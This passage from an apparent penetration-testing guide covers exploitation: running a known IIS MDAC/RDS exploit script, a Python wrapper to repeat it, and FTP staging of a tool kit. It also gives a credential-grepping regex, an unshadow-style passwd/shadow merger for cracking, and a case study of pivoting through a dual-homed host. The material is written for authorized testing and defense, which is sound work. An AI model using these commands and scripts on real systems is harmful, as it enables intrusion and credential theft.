1. Network Enumeration/Discovery
2. Vulnerability Analysis
3. Exploitation
5.3 Exploitation
Once the list of vulnerabilities has been identified, the next step is to exploit them in an attempt to gain root- or admin-level access to the target systems.
Our general procedure is shaped in part by the results of our enumeration and information gathering. We examine the list of known vulnerabilities and potential security holes on the various target hosts and determine which are most likely to be fruitful. We then pursue those vulnerabilities to gain root access on the target systems.
Primary targets are open ports and potentially vulnerable applications. Our approach is to review the list of vulnerabilities collected in the previous stage and sort them by likelihood of success and potential harm to the target network to see which may be helpful in our exploitation efforts. For instance, a buffer overflow or denial-of-service attack may well be successful on the target but also dangerous to the system. Unless the contract specifically calls for DoS attacks to be performed as part of the test, they should not be attempted.
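To make this triage step concrete, it can be sketched in a few lines of Python. The hosts, issues, and scores below are illustrative placeholders rather than output from a real scan, and the scoring scheme is our own convention:

# Minimal sketch of the vulnerability-triage step described above.
# All entries and scores are illustrative, not from a real scan.
vulnerabilities = [
    {"host": "10.0.0.5", "issue": "IIS MDAC/RDS", "success": 0.8, "harm": 0.2, "dos": False},
    {"host": "10.0.0.7", "issue": "buffer overflow", "success": 0.7, "harm": 0.9, "dos": False},
    {"host": "10.0.0.9", "issue": "SYN flood", "success": 0.9, "harm": 1.0, "dos": True},
]

# Drop denial-of-service attacks unless the contract explicitly permits them.
DOS_PERMITTED = False
candidates = [v for v in vulnerabilities if DOS_PERMITTED or not v["dos"]]

# Favor high likelihood of success and low potential harm to the target.
candidates.sort(key=lambda v: (-v["success"], v["harm"]))
for v in candidates:
    print(f'{v["host"]}: {v["issue"]} (success={v["success"]}, harm={v["harm"]})')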
Web-server hacks are among the most common exploits and are fast becoming a popular way to compromise target networks. One popular Web-based hack is the Microsoft IIS MDAC/RDS hack, an exploitation of the IIS Web server through the msadcs.dll file and the Remote Data Service (RDS). It allows the attacker to execute a single command on the target host. The exploit can be reused to execute a succession of individual commands that, taken together, achieve a variety of results, such as retrieving sensitive files on the target host and making connections to other hosts. When used in conjunction with other tools, such as the ntuser command, it can also be used to place a user into the local Administrators group.
A Perl script, msdacExploit.pl, coded by rain forest puppy, can remotely exploit this vulnerability and is widely available. (It is not the only script written to exploit this hole.) To perform this exploit, run the following command against the target host.
C:\> perl -x msdacExploit.pl -h <target host>
(You do not have to run it from the C drive.) A command prompt from the target host should appear on your machine and allow you to execute one command. To run multiple commands, the exploit must be run multiple times, as sketched below.
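Because each run executes only one command, the repetition lends itself to a simple wrapper. The following Python sketch is not the exploit itself; it assumes, hypothetically, that the script takes the target via -h and reads the command to execute from standard input, so the interface of the actual script you use may differ:

# Hypothetical wrapper: rerun the exploit once per command, since each
# run executes only a single command on the target. Assumes the script
# reads the command from standard input; adjust to match the interface
# of the exploit script actually in use.
import subprocess

TARGET = "192.0.2.10"  # placeholder target host
commands = [
    "ipconfig /all",
    "dir c:\\",
]

for cmd in commands:
    subprocess.run(
        ["perl", "-x", "msdacExploit.pl", "-h", TARGET],
        input=cmd + "\n",
        text=True,
        check=False,  # keep going even if one command fails
    )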
Once we have obtained unauthorized access to a remote system, through either the ability to execute a command on a target host or direct access to an actual user account, we immediately document all relevant information: the host and the directory or share name to which we have gained access, the host from which we gained access, the date and time, and the level of access. We also specify the hole(s) we exploited to gain access. Next, we share this information with the target organization. This serves two purposes: (1) it alerts the organization to the hole(s) we have identified and exploited so that the company can begin to address the issue, and (2) it covers us as penetration testers from a litigation standpoint. Even in the case of an unannounced test, our point of contact (who is aware of our activities) should know when we have gained access so that, if we are detected, the matter is not escalated to law enforcement authorities.
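The record kept at this point can be as simple as one structured entry per compromise. The sketch below mirrors the fields just listed; the structure and the example values are our own convention, not a standard reporting format:

# Sketch of a per-compromise record mirroring the fields listed above.
# Structure and example values are illustrative conventions only.
from dataclasses import dataclass, field
from datetime import datetime, timezone

@dataclass
class AccessRecord:
    target_host: str            # host to which we gained access
    share_or_directory: str     # directory or share name accessed
    source_host: str            # host from which we gained access
    access_level: str           # e.g., "user", "admin", "root"
    holes_exploited: list[str]  # hole(s) used to gain access
    timestamp: datetime = field(default_factory=lambda: datetime.now(timezone.utc))

record = AccessRecord(
    target_host="192.0.2.10",
    share_or_directory="C$\\InetPub",
    source_host="198.51.100.7",
    access_level="admin",
    holes_exploited=["IIS MDAC/RDS (msadcs.dll)"],
)
print(record)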
Gaining access to one machine is not necessarily the end of our penetration test. If additional work is within scope, we can continue by installing a tool kit comprising the tools we can use to test other systems from the exploited box. This is different from the "root kit" used within the hacker community, a collection of tools and exploits used either to compromise the same system again in the future (by creating back doors or Trojaning system files) or to launch attacks against other hosts (such as distributed denial-of-service daemons).
This tool kit is tailored to the operating system of the target machine and of the machines we may encounter during the penetration test. Generally, we include netcat, password crackers, remote control software, sniffers, and discovery tools. Command-line tools are often preferred because of the limitations of the connection. GUI tools can be used if a remote control program such as pcAnywhere or Virtual Network Computing (VNC) is first installed. Otherwise, having the target send a GUI back to our box can be tricky: the traffic may still be blocked at the firewall or by the host itself, and the GUI can sometimes be displayed on the target machine instead, alerting that machine's user to our presence and activities.
The tool kit can be copied over with FTP or TFTP, but other means are possible as well. Once the kit is installed, we can begin penetration testing other machines. At this point, the methodology we use closely follows the internal testing method since we are essentially located on the target network. Refer to Chapter 7 for information on how to proceed with testing of additional systems.
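As one illustration of staging the kit over FTP, the sketch below uses Python's standard ftplib. The host, credentials, and file names are placeholders, and in practice the transfer may run in either direction, pushing files to the target or pulling them from our own server through commands executed on the compromised box:

# Sketch: staging a tool kit over FTP with Python's standard ftplib.
# Host, credentials, and file names are placeholders.
from ftplib import FTP

TOOLKIT = ["nc.exe", "cracker.exe", "sniffer.exe"]  # illustrative names

with FTP("192.0.2.10") as ftp:       # placeholder compromised host
    ftp.login("user", "password")    # placeholder credentials
    for name in TOOLKIT:
        with open(name, "rb") as fh:
            ftp.storbinary(f"STOR {name}", fh)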
Among the tools we install are sniffers and keystroke capture utilities, through which we can capture client traffic. We look specifically for user names and passwords that can be used to attempt access to other hosts, dial-in systems, or listening services on the network. Sniffers are discussed further in Chapter 14.
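Once traffic has been captured, even a crude pass over a plaintext capture can surface credentials. The sketch below simply greps a capture file for credential-bearing lines; the keyword pattern is our own choice, and a real engagement would rely on a proper sniffer (again, see Chapter 14):

# Sketch: sift a plaintext capture file for credential-bearing lines.
# The keyword pattern is illustrative; a real sniffer does far more.
import re

CRED_PATTERN = re.compile(r"(user(name)?|login|pass(word)?)\s*[:=]", re.I)

with open("capture.txt", errors="replace") as fh:
    for lineno, line in enumerate(fh, 1):
        if CRED_PATTERN.search(line):
            print(f"{lineno}: {line.rstrip()}")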
We also use remote control tools that allow us to drive the system directly. There is tremendous potential for further network compromise once we have taken over one machine. We may capture the UNIX password file (along with the shadow password file) or the Windows registry (often through the version stored in the repair directory) to obtain passwords for all users on the machine, and possibly the admin account(s), which likely give us access to additional machines on the network. Remote control tools and their usage are discussed further in Chapter 18.
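For the UNIX case, the captured passwd and shadow files typically must be recombined before being fed to an offline cracker. The sketch below does this in the style of the classic unshadow utility; the file names are placeholders for the copies pulled off the target:

# Sketch: merge captured copies of /etc/passwd and /etc/shadow into
# cracker-ready input, in the style of the classic "unshadow" utility.
def unshadow(passwd_path: str, shadow_path: str) -> list[str]:
    hashes = {}
    with open(shadow_path) as fh:
        for line in fh:
            fields = line.rstrip("\n").split(":")
            if len(fields) >= 2:
                hashes[fields[0]] = fields[1]   # user -> password hash
    merged = []
    with open(passwd_path) as fh:
        for line in fh:
            fields = line.rstrip("\n").split(":")
            if len(fields) >= 2:
                # Replace the "x" placeholder with the real hash, if captured.
                fields[1] = hashes.get(fields[0], fields[1])
                merged.append(":".join(fields))
    return merged

for entry in unshadow("passwd.copy", "shadow.copy"):  # placeholder paths
    print(entry)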
In any case, we load whatever tools will help us to use the compromised system as a platform for exploiting additional systems. However, as we load these tools, we keep careful track of what was loaded and where so we can return the system to normal after testing.
Case Study
Dual-Homed Hosts
As mentioned in Chapter 4, dual-homed hosts introduce a significant security hole into the network architecture because they can give users with access rights and privileges on one network or domain rights and privileges they are not intended to have on a separate domain. This vulnerability usually appears as a corporate desktop machine connected to the organization's internal LAN while simultaneously connected through a modem line to a local ISP. In such a configuration, anyone on the Internet may be able to access the corporate network through the dial-up connection. However, there are other configurations in which this vulnerability can occur.
For example, on one engagement in particular, the client was an ISP that also provided Web-hosting services for thousands of companies. The hosting facility consisted of a large number (in the hundreds) of identically configured UNIX-based hosts running Netscape Web servers.
Rather than providing full management, the ISP's model was to maintain the machines but allow the clients to manage the Web servers themselves.
Included in the Web-hosting package was the Tcl scripting language, which allowed remote management of the Web servers. What was perhaps unknown to the ISP is that, through Tcl, knowledgeable clients and even visitors to the hosted Web sites could do more than basic administration. It was possible to use the Web server, which was running with root privileges, to gain root access on the machines through various specially crafted URL strings. This is an input-validation attack against the Web server.
This led to the compromise of the host machine, in much the same way misconfigured Microsoft IIS servers can be compromised. However, this did not turn out to be the worst exposure on the network.
Once a machine on the Web-hosting network was compromised (that is, root access was achieved), a hacker tool kit could be loaded onto that machine, including tools to crack passwords. Having gained root access on one machine, we were able to determine that the network was connected to a second network used to support various business units of the ISP. Further, we found that some users on the Web-hosting network had accounts on the second network as well and used the same passwords.
At this point, access to this second network was achieved simply through accounts that had the same user name and password on both networks, and the hacker tool kit could again be copied and installed.
We were able to determine that a machine on this second network was also homed on a third network. This third network was the corporate, internal network used to support payroll and accounting functions and to maintain client databases and other such valuable assets. It was intended to be a stand-alone, internal network; one machine was mistakenly left dual-homed.
This machine was discovered when we identified that it had two network interface cards (NICs) with IP addresses belonging to two separate address ranges. Therefore, user accounts (and the root account) on this box had rights on both networks. As could be expected, the root account had the same password on all hosts in the second network, and we therefore gained root access to the organization's core, internal network.
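A dual-homed box of this kind can be flagged mechanically by enumerating a host's interfaces and checking whether its addresses fall into more than one known range. The sketch below assumes the third-party psutil package and illustrative address ranges; the same information can be read from ip addr or ipconfig output:

# Sketch: flag a host as dual-homed if its interfaces carry addresses
# from more than one known network range. Ranges are illustrative, and
# psutil (a third-party package) is an assumed dependency.
import ipaddress
import socket

import psutil

KNOWN_RANGES = [
    ipaddress.ip_network("10.1.0.0/16"),  # e.g., Web-hosting network
    ipaddress.ip_network("10.2.0.0/16"),  # e.g., internal corporate network
]

ranges_seen = set()
for iface, addrs in psutil.net_if_addrs().items():
    for addr in addrs:
        if addr.family != socket.AF_INET:
            continue
        ip = ipaddress.ip_address(addr.address)
        ranges_seen.update(net for net in KNOWN_RANGES if ip in net)

if len(ranges_seen) > 1:
    print("Dual-homed: interfaces span", ranges_seen)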
In summary, it was possible to gain root access to a machine on the Web-hosting network using software existing on the Web servers themselves, to jump to a second network through user accounts with the same user name/password pairs, and finally, after discovering a dual-homed box, to gain unauthorized access to the internal corporate network. Strictly speaking, since valid access rights had been attained, this access was "authorized" in the sense that the access control mechanisms neither stopped it nor identified it as improper.
When the company's managers realized that they had inadvertently left a machine on their internal, private network dual-homed on a network with connections to the outside world, thereby jeopardizing the integrity and confidentiality of the company's critical data assets and client information, they were understandably shocked and mortified.
Lessons Learned
We have seen several cases in which an organization was unaware that a dual-homed machine existed, or in which the organization had used a dual-homed host as an easy fix for problems with certain applications communicating through firewalls. The moral of the story is that close attention needs to be paid to an organization's network architecture. After a secure architecture has been designed and implemented, covering both host configuration and overall network topology, any changes must go through a change-control mechanism to help prevent security exposures such as the dual-homed scenario from sneaking into the environment.